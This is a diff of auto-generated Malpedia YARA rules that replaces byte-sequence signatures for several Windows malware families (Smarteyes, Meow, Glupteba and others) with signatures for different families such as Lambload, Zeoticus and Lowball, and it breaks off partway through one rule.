-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smarteyes_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lambload_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "a98816f76882e4d75e28a23473f5f4b08f8f9c7a339abedcd3611228b4563cbb"
+		logic_hash = "bbe1c88e2fad81661a6dd79b8985da064315d8e7bbf36d0a65857b53079669fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130801,32 +130656,32 @@ rule MALPEDIA_Win_Smarteyes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 84c9 75f6 8b8da8feffff 8bc1 c1e817 2401 8885dafeffff }
-		$sequence_1 = { 8b7b3c 898580fbffff 33c0 66898594fbffff 8b432c 89859cfbffff 8b4310 }
-		$sequence_2 = { 84c9 75f9 2bc6 8d8418280a0000 50 e8???????? 8bd8 }
-		$sequence_3 = { 3bc8 727c 03c0 8945fc 3bc1 7703 894dfc }
-		$sequence_4 = { ffb5e0feffff e8???????? 59 8bbde4feffff 8b4508 6a4b 83c708 }
-		$sequence_5 = { 814df800000001 3bd7 7507 814df800008000 8b5d08 57 }
-		$sequence_6 = { 33c9 3c01 0f94c1 8d442430 52 51 50 }
-		$sequence_7 = { 50 e8???????? 8b4de4 83c40c 6bc930 8975e0 8db118bb0210 }
-		$sequence_8 = { 56 57 6a09 59 33c0 be1c010000 56 }
-		$sequence_9 = { 53 55 56 57 33c0 be???????? 6a06 }
+		$sequence_0 = { 6a00 6a02 8bf9 c785c0fbffff04010000 ff15???????? }
+		$sequence_1 = { f3a4 ffb5c4fbffff ff15???????? 8d7bfe }
+		$sequence_2 = { 0f8468ffffff 8d85f4fdffff 50 e8???????? }
+		$sequence_3 = { c70009000000 ebc5 8bc3 c1f805 8d3c8500490710 8bf3 83e61f }
+		$sequence_4 = { 8a00 88443dfc 8a5dfd 47 ff4508 }
+		$sequence_5 = { 33c9 3bc7 0f95c1 894604 8d41ff 8b4dfc 5f }
+		$sequence_6 = { 394510 7241 6a04 5b 7705 }
+		$sequence_7 = { 59 8945e0 85c0 7461 8d0cbd00490710 }
+		$sequence_8 = { 8bff 56 57 33ff ffb7602b0710 }
+		$sequence_9 = { 6685c9 75f4 8b4dfc 8bfb 8bf0 }
 
 	condition:
-		7 of them and filesize < 429056
+		7 of them and filesize < 1039360
 }
-rule MALPEDIA_Win_Meow_Auto : FILE
+rule MALPEDIA_Win_Zeoticus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ae50208-eda0-5ebd-a6a9-2e33c00b8273"
+		id = "e7b44470-c2f9-5eee-bb9d-e8020120bbe3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meow_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeoticus_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "bb1378303eade72e8b389282cb73ba0dc64a8fed8abbcfd4aff9fb59d7155dea"
+		logic_hash = "9c3c5f162f682b504ac63e5a0d758fab5141989ce6052830dd9338be25cf4ff1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130840,32 +130695,32 @@ rule MALPEDIA_Win_Meow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c68561ffffff16 c68562ffffff23 c68563ffffff12 c68564ffffff23 c68565ffffff70 c68566ffffff23 }
-		$sequence_1 = { 8985ccfdffff 85c0 0f8431020000 8b483c 03c8 0fb74118 3b85c4fdffff }
-		$sequence_2 = { 7431 b802000000 2bc1 0345f0 8945f0 8b45f0 99 }
-		$sequence_3 = { f7fb 88540df1 41 83f90a 72de 8d45f1 898588feffff }
-		$sequence_4 = { 33c5 8945fc 53 56 0f57c0 894de8 33f6 }
-		$sequence_5 = { 83c408 eb35 0fb605???????? b225 50 }
-		$sequence_6 = { 51 52 e8???????? 83c408 8b8c24f4050000 }
-		$sequence_7 = { 6849372c4f ba0f000000 8d1c3f e8???????? 83c408 68???????? }
-		$sequence_8 = { 7415 83e801 0f8595010000 c745e498024300 e9???????? 894de0 }
-		$sequence_9 = { 8bf7 8d7b75 0f1f4000 8a06 8d7601 0fb6c8 83e953 }
+		$sequence_0 = { 660f6e9c248c000000 660f62d8 0f29942490000000 660f6e942414010000 660f62ca 660f6e9424a0000000 0f295c2410 }
+		$sequence_1 = { b9d0fe4bac e8???????? 83c408 a3???????? 6a00 6a00 }
+		$sequence_2 = { 660feff0 8345f010 0f117710 8345ec10 83c720 0f1002 }
+		$sequence_3 = { 8d8690101000 8bd7 8d8ee8101000 50 83ec08 e8???????? }
+		$sequence_4 = { 0f286c2430 660fd4e0 0f29bc2490000000 660f73d03f 660f6eff 660fefe0 660f3a0fdd08 }
+		$sequence_5 = { 8b842498010000 898424f0000000 8b84249c010000 898424f4000000 8b8424a0010000 898424f8000000 8b8424a4010000 }
+		$sequence_6 = { 8b4618 314718 8b461c 31471c 8b4620 }
+		$sequence_7 = { 50 6a00 ff15???????? 85c0 0f84e7000000 33db 33c9 }
+		$sequence_8 = { 8b7020 03f3 0f1f4000 8b06 bac59d1c81 03c3 }
+		$sequence_9 = { 0f295c2410 0f28442410 660f62c1 660fd4c6 660f6ec9 660fd4c5 660f62ca }
 
 	condition:
-		7 of them and filesize < 492544
+		7 of them and filesize < 468992
 }
-rule MALPEDIA_Win_Gacrux_Auto : FILE
+rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08e3a0a1-da81-5882-b134-65281af51162"
+		id = "85d5c577-b8ec-58e5-9740-0a0ca10b0ae9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gacrux_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.concealment_troy_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "6278ae90a5acb1d1e22aec25afba6eadcc43cdc1399d5403571d5596bb5e391d"
+		logic_hash = "b00daac439b94b56b64f9d02955d44b706d6186abc3a4c26b1bfb61dd4d222d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130879,32 +130734,32 @@ rule MALPEDIA_Win_Gacrux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 743c 6548 8b0425???????? 80780201 7428 48 }
-		$sequence_1 = { 33db e8???????? 48 8bf8 48 85c0 742f }
-		$sequence_2 = { 3900 75f4 48 63c2 85d2 740a 48 }
-		$sequence_3 = { 740b 41 81cb00900000 45 895821 40 f6c610 }
-		$sequence_4 = { e8???????? 4c 8bc3 33d2 48 8bcf ffd0 }
-		$sequence_5 = { 3c40 755f 41 0fbaea1e 40 8ac7 c0e803 }
-		$sequence_6 = { 0fb6c3 44 3bc8 0f850f010000 44 0fb66d67 43 }
-		$sequence_7 = { 75f6 e8???????? 48 83c428 c3 48 }
-		$sequence_8 = { eb02 33db 8b4c2460 0337 392f 75a5 eb5d }
-		$sequence_9 = { 83e801 7463 83e801 7457 83e802 744b }
+		$sequence_0 = { c744244000000000 ff15???????? 85c0 0f844cffffff 8b542424 }
+		$sequence_1 = { 7530 8b54240c 52 ff15???????? 53 }
+		$sequence_2 = { 8bc8 83e103 f3a4 8d542418 8d8c2430090000 e8???????? 85c0 }
+		$sequence_3 = { 3acb 75f6 6804010000 8d8c2424010000 53 }
+		$sequence_4 = { f3a5 66a5 83c40c a4 8d4c2418 8d642400 8a01 }
+		$sequence_5 = { 85c0 0f8476ffffff 6a00 6a08 6a00 }
+		$sequence_6 = { e8???????? 83c414 ebd0 8bc8 c1f905 8d3c8da0774100 }
+		$sequence_7 = { 8d8c2470050000 68???????? 51 e8???????? 8d842478050000 83c418 8d5001 }
+		$sequence_8 = { b87c130000 e8???????? a1???????? 33c4 89842478130000 53 }
+		$sequence_9 = { 52 889c242c010000 e8???????? 6807020000 8d842441090000 53 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Htran_Auto : FILE
+rule MALPEDIA_Win_Lowball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5705bf81-9a36-5bdc-a413-5dc9bbe8f8e2"
+		id = "54da57b9-ab1c-5339-aa9f-22bb43699408"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htran_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowball_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "f4c537d909874a527abd7f69551092957789e48daeb6a5277998dd498c7b0511"
+		logic_hash = "6556d6fae2a4a8629aa4a1cdf4ec37ace65e626c581801de62deac1b596c79de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130918,32 +130773,32 @@ rule MALPEDIA_Win_Htran_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b942430510000 55 52 68???????? e8???????? }
-		$sequence_1 = { e8???????? 83c404 e9???????? 68???????? e8???????? 8b942430510000 }
-		$sequence_2 = { 8d3449 8d34b5f09b4000 83c00c 3bc6 7305 }
-		$sequence_3 = { 68???????? 6a02 e8???????? 8bb42400020000 83c408 83fe02 0f8ef0000000 }
-		$sequence_4 = { 5e 83c414 c3 6a05 }
-		$sequence_5 = { 8b8424e0420100 33c9 894c2414 53 8b10 }
-		$sequence_6 = { ff15???????? 85c0 7d14 68???????? e8???????? 83c404 }
-		$sequence_7 = { c3 6a00 6a01 6a02 ff15???????? 85c0 }
-		$sequence_8 = { 8816 46 8a10 40 0fb6da f683c1c3400004 740c }
-		$sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 }
+		$sequence_0 = { 85c0 0f848d000000 8d842434070000 68???????? }
+		$sequence_1 = { 8d4b01 51 e8???????? 56 }
+		$sequence_2 = { 85f6 89742410 0f84bf000000 8b8c241c020000 }
+		$sequence_3 = { 6810270000 ff15???????? bf???????? 83c9ff }
+		$sequence_4 = { 0f840c010000 8b8c2424020000 53 55 55 }
+		$sequence_5 = { 896c2418 c744242400020000 aa e8???????? 55 }
+		$sequence_6 = { 84c0 750b 33c0 81c4400e0000 c21000 }
+		$sequence_7 = { 68???????? e8???????? 83c410 85c0 0f848d000000 8d842434070000 }
+		$sequence_8 = { 85c0 752d 68b80b0000 ffd3 8d84242c050000 8d8c241c010000 50 }
+		$sequence_9 = { 8b742420 53 ff15???????? 5b 56 ff15???????? 8b44240c }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Glupteba_Auto : FILE
+rule MALPEDIA_Win_Shipshape_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f0d5e7d7-1d32-5f42-920b-16ebe0ccac58"
+		id = "d9d684b1-6d28-5be9-a8dd-2a5e64ca3d0c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glupteba_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shipshape_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "833c38370ca2666b80daaec86c0f2af9a38d0d465a2faa6f122cd9317cf83227"
+		logic_hash = "7ccbb1b47c0ba6ada9222b7cb4a37cd39065499a023a5e14e23083e9a19aaeee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130957,38 +130812,32 @@ rule MALPEDIA_Win_Glupteba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81e680800000 895de4 0bfe 8b75fc c1ee07 c1e709 }
-		$sequence_1 = { 742f 68???????? 50 c705????????04000000 ff15???????? 833d????????04 }
-		$sequence_2 = { 83c40c ff750c 66c745f00200 ff15???????? 668945f2 6a10 }
-		$sequence_3 = { ff15???????? 83c444 ff750c ff7508 e8???????? 8bf0 }
-		$sequence_4 = { 68???????? 57 895d0c ff15???????? }
-		$sequence_5 = { 8b4c2404 c1e802 d1e9 0ac1 8ac8 }
-		$sequence_6 = { 03c0 33c8 8bc1 3500630000 c1e808 33c1 }
-		$sequence_7 = { 895f04 894f08 83c710 837d0824 897d0c 7285 8bf9 }
-		$sequence_8 = { 005e3e 46 00ff 3e46 }
-		$sequence_9 = { 00cd 3e46 005e3e 46 }
-		$sequence_10 = { 0107 eb4d 8b02 89442418 }
-		$sequence_11 = { 00ff 3e46 0012 3f }
-		$sequence_12 = { 0101 03d3 8b4620 8bcb }
-		$sequence_13 = { 0106 830702 392e 75a0 }
-		$sequence_14 = { 00f1 3d46005e3e 46 00cd }
-		$sequence_15 = { 0012 3f 46 008bff558bec }
+		$sequence_0 = { 8d9424f8010000 c1e902 f3a5 8bc8 }
+		$sequence_1 = { 83f843 7c55 50 e8???????? }
+		$sequence_2 = { 8bf7 c1f805 83e61f 8d1c8560d54000 c1e603 }
+		$sequence_3 = { 83e11f 8b3cbd60d54000 8d3ccf eb05 bf???????? }
+		$sequence_4 = { f3a5 8bcd 8d942434030000 83e103 f3a4 8dbc2434020000 83c9ff }
+		$sequence_5 = { 808801c4400008 40 3dff000000 72f1 }
+		$sequence_6 = { 8bbc2410020000 83c9ff 33c0 8d54240c f2ae }
+		$sequence_7 = { 55 ff15???????? 5d 5b 81c440060000 c3 56 }
+		$sequence_8 = { 0f8430010000 8dbc2434010000 83c9ff 33c0 8d9424b4010000 }
+		$sequence_9 = { 52 50 e8???????? 8b4c241c 8b542418 }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 338386
 }
-rule MALPEDIA_Win_Sagerunex_Auto : FILE
+rule MALPEDIA_Win_Lunchmoney_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bc17e45-f6b5-56f7-b7ea-e25c9e23d339"
+		id = "ba6c488f-494f-59a0-832f-5ecc104022f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sagerunex_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lunchmoney_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "da6b189b8ae26a86626e8770a2d7d0803155a13ac9a34b2d4bbc9044c0ab3fcc"
+		logic_hash = "6300f50e09ecd16cc8482866a3984ff2f46b18e4b4ec53df6a00261299e6917f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131002,32 +130851,32 @@ rule MALPEDIA_Win_Sagerunex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 0fb74b02 4803cb e8???????? 8d7701 ba04010000 e9???????? }
-		$sequence_1 = { 8bc7 ffc7 3d00010000 0f8f2a030000 488bcb e8???????? 85c0 }
-		$sequence_2 = { 4156 4157 4881ec60020000 488b05???????? 4833c4 4889842450020000 4d8bf1 }
-		$sequence_3 = { 448bc3 e8???????? 33c0 c744242801234567 c744242c89abcdef c7442430fedcba98 c744243476543210 }
-		$sequence_4 = { b801000000 488b8c2490000000 4833cc e8???????? 488b9c24d8000000 4881c4a0000000 5f }
-		$sequence_5 = { 41b8000c0000 c744247001000000 48ffc3 4889442478 48894580 c744245001000000 4889442458 }
-		$sequence_6 = { 488bcf 7512 e8???????? 85c0 751e 488d0d6e500300 eb8a }
-		$sequence_7 = { 4983d300 4d034838 4d3b4838 4d894838 4983d300 4983c040 49ffcf }
-		$sequence_8 = { f0ff00 488d4128 41b806000000 488d1560db0100 483950f0 740b 488b10 }
-		$sequence_9 = { 03d8 41bc67666666 41b80d000000 f20f11450a f20f1005???????? 418bc4 4c8d4d90 }
+		$sequence_0 = { 50 8d4da8 e8???????? 89759c }
+		$sequence_1 = { 214610 c7461407000000 668906 68???????? c645fc0b e8???????? }
+		$sequence_2 = { c1e106 8b048550914200 88540804 8b0f }
+		$sequence_3 = { 3b4e04 7411 57 8bf8 }
+		$sequence_4 = { 8b9df0efffff 2b7008 037004 6a00 8b049d50914200 5b f644010480 }
+		$sequence_5 = { e9???????? 8365e500 8d45e4 6a0a 50 57 }
+		$sequence_6 = { 8b5584 0500040000 41 3bc2 76f6 8bf1 }
+		$sequence_7 = { 83c410 8b048550914200 3b740128 0f85b9010000 3b54012c 0f85af010000 }
+		$sequence_8 = { e8???????? 83c430 3c01 0f8584000000 83ec18 }
+		$sequence_9 = { 85c0 757c 837dec00 7476 8b55f4 8b049550914200 f644180448 }
 
 	condition:
-		7 of them and filesize < 619520
+		7 of them and filesize < 373760
 }
-rule MALPEDIA_Win_Adhubllka_Auto : FILE
+rule MALPEDIA_Win_Snake_Disk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad2942ad-0768-5d25-b2fe-1ba7ec43f66b"
+		id = "86a91047-7721-509e-9428-5943ccd33d29"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adhubllka_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake_disk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snake_disk_auto.yar#L1-L93"
 		license_url = "N/A"
-		logic_hash = "e47f134b0db44fb4d451c84c4568ba6117ac83a59e51548a061c4d0fcde2d289"
+		logic_hash = "e3a90a61952999ecca57fcbf79005364fd6ba06d48c543b4f3fe48fb8c119e3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131041,32 +130890,30 @@ rule MALPEDIA_Win_Adhubllka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45c8 894590 8b45c4 894598 8b45c0 898560ffffff }
-		$sequence_1 = { 03459c 8bc8 c1c307 334d94 c1c110 03f1 8bd6 }
-		$sequence_2 = { 33c9 25000f0000 c705????????01000000 3d000f0000 8b45d4 }
-		$sequence_3 = { c78424a8000000787e4100 c78424ac000000807e4100 c78424b0000000887e4100 c78424b4000000907e4100 }
-		$sequence_4 = { 8b4b14 894734 83c240 8b45e8 83c640 83e840 }
-		$sequence_5 = { ffb52cfbffff 56 ffb518fbffff 51 8b8d30fbffff e8???????? }
-		$sequence_6 = { 56 57 ff15???????? 68???????? 57 ff15???????? 8d85a4fdffff }
-		$sequence_7 = { 8b3d???????? 8b442410 8b4c2414 8b542418 d1e8 41 83ea01 }
-		$sequence_8 = { 83ff40 725c 8b45ac 8b4d9c 0f1006 8b559c 0f105610 }
-		$sequence_9 = { 7707 8b4310 3bd0 730e 8d463f 3bc8 773b }
+		$sequence_0 = { e8???????? 898558ffffff 85c0 0f84a30b0000 }
+		$sequence_1 = { e8???????? 898548ffffff 8b08 8b8184010000 8d4db4 898544ffffff 397dac }
+		$sequence_2 = { e8???????? 898550ffffff 897dbc 3bf8 }
+		$sequence_3 = { e8???????? 89855cffffff ff7720 e8???????? }
+		$sequence_4 = { e8???????? 898560ffffff 85c0 0f8410070000 }
+		$sequence_5 = { e8???????? 898550ffffff 59 59 }
+		$sequence_6 = { e8???????? 89855cffffff 85c0 7874 }
+		$sequence_7 = { e8???????? 898550ffffff 85c0 0f84a4000000 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 28734464
 }
-rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
+rule MALPEDIA_Win_Dubrute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52cb4cda-5730-54cc-9d0c-9a1defab8d55"
+		id = "8b3f57fb-3926-53bd-845a-86ae7ddb65ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.breakthrough_loader_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dubrute_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4417981ceb1c9a0093d9616e44b7782cd49e18f4737822a85a59217b8658f0b2"
+		logic_hash = "15ef5a601ee94177845777a653e057c97a84bc2521287b368cd711d048d0bf0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131080,32 +130927,32 @@ rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb06 8b3d???????? 8b4df4 85c9 7403 }
-		$sequence_1 = { 50 57 ff15???????? 85c0 740a ba???????? e8???????? }
-		$sequence_2 = { 83c408 83f8ff 742a 8b75f8 8bce 8935???????? }
-		$sequence_3 = { ff5220 83e800 7412 83e801 7411 8b4c2424 }
-		$sequence_4 = { 56 57 8965f0 8955dc bb???????? 895de4 33ff }
-		$sequence_5 = { 7408 8b10 8bc8 6a01 ff12 5f 5e }
-		$sequence_6 = { 8b048540354500 f644012880 745d 8d45d8 50 ff75e4 ff15???????? }
-		$sequence_7 = { 85c0 7fb4 837dc810 8d4db4 0f434db4 33c0 }
-		$sequence_8 = { ff75e4 e8???????? 8b7508 c746140f000000 }
-		$sequence_9 = { 895de4 8b049d40354500 8945d4 8955e8 8a5c1029 }
+		$sequence_0 = { ff15???????? 8d85d0fcffff bfff000000 50 57 ff15???????? 8d85d0fcffff }
+		$sequence_1 = { ff7514 8b8674090000 ff7510 ff750c ff7008 e8???????? 83c410 }
+		$sequence_2 = { 55 8bec 83ec24 56 57 6a0c 8d45f4 }
+		$sequence_3 = { 395008 7510 8b4808 3bca 7c09 83f907 7f04 }
+		$sequence_4 = { e9???????? 8d45fc 50 53 e8???????? 59 85c0 }
+		$sequence_5 = { 8b8040000100 83b81804000000 741e 837df800 7418 83b80c04000008 7e0f }
+		$sequence_6 = { 894508 8d8564ffffff 6a01 50 8d4dc8 ff15???????? db4508 }
+		$sequence_7 = { ff7508 50 e8???????? 8bf0 8d7de8 }
+		$sequence_8 = { 8bf0 8d7df0 a5 a5 a5 8b75f0 83c43c }
+		$sequence_9 = { 0f8cce000000 83650800 837f0400 8b7510 bb???????? 7e70 8b07 }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
+rule MALPEDIA_Win_Deltas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "558f1792-1bb2-5d9b-859d-0b6382b27ab5"
+		id = "71773355-27de-50f9-b937-a4b31a08be87"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.punkey_pos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deltas_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a4ee7826b83e8d1ab2e9aee9c2a1f21a3ae3a3b9d6fb52555b83791b8ed2dd78"
+		logic_hash = "110bf37db48ce7c93aacf644fe14f61a7699258651c7d440500f0fe2335e7ad7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131119,32 +130966,32 @@ rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff05???????? 8b0d???????? 56 57 6a00 51 ff15???????? }
-		$sequence_1 = { 56 ffd7 a3???????? 85c0 74ae 5f b801000000 }
-		$sequence_2 = { 68e7070000 50 ff15???????? ff05???????? }
-		$sequence_3 = { 741d a1???????? 85c0 740e 56 57 68e7070000 }
-		$sequence_4 = { ffd7 a3???????? 85c0 74ae 5f b801000000 }
-		$sequence_5 = { 50 a1???????? 50 ff15???????? 5d c20c00 }
-		$sequence_6 = { 85c0 7919 8b4d10 8b550c }
-		$sequence_7 = { a3???????? 85c0 74ae 5f b801000000 }
-		$sequence_8 = { ff15???????? c705????????00000000 c3 3b0d???????? 7502 f3c3 e9???????? }
-		$sequence_9 = { 56 57 68e7070000 50 ff15???????? ff05???????? }
+		$sequence_0 = { 55 56 8bf1 57 b940000000 33c0 }
+		$sequence_1 = { 55 53 ff15???????? 85c0 7419 }
+		$sequence_2 = { 66ab 8d8c247c010000 6804010000 51 c64424146d }
+		$sequence_3 = { eb45 8b8c249c000000 8d442454 8d7c2454 bd10000000 8d7102 }
+		$sequence_4 = { 85c0 0f8485010000 8b9884000000 8b8888000000 81c38c000000 83f906 0f8733010000 }
+		$sequence_5 = { c1ef14 c1e10c 0bf9 8b4828 03fe 894c2438 8bcf }
+		$sequence_6 = { 8b7824 03f3 897c241c 8bfe 23ee f7d7 }
+		$sequence_7 = { 88442423 8d442408 b164 b261 50 c644240c6b c644240e72 }
+		$sequence_8 = { 3bc3 7413 8d542438 52 8b542444 53 53 }
+		$sequence_9 = { 750e 8d4c2464 51 ffd6 898424c0000000 8d9424b0000000 52 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Moonwind_Auto : FILE
+rule MALPEDIA_Win_Iispy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9622b32-c792-5aeb-a059-5721d1f27a2f"
+		id = "4e322e5f-cd33-52bd-bbf3-6439753e827c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonwind_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iispy_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "6d3886946e413d262cc391b5e8605e5201d1334018954f9d8c7fe7ffb4921df3"
+		logic_hash = "a87fdac5aecf4afd1bb012fec4f493869a7cd5fec753856e83872c6436c79acf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131158,32 +131005,32 @@ rule MALPEDIA_Win_Moonwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b90f000000 f3ab 83c308 b800000000 }
-		$sequence_1 = { 83c404 03d8 895dec 8965e8 6828000000 8b45f0 50 }
-		$sequence_2 = { 3965a8 740d 6806000000 e8???????? 83c404 50 8b5da4 }
-		$sequence_3 = { 83c404 8b45ec 50 8b1d???????? 85db 7409 53 }
-		$sequence_4 = { e8???????? 83c428 8945ac 8b45ac 50 8b5dd8 53 }
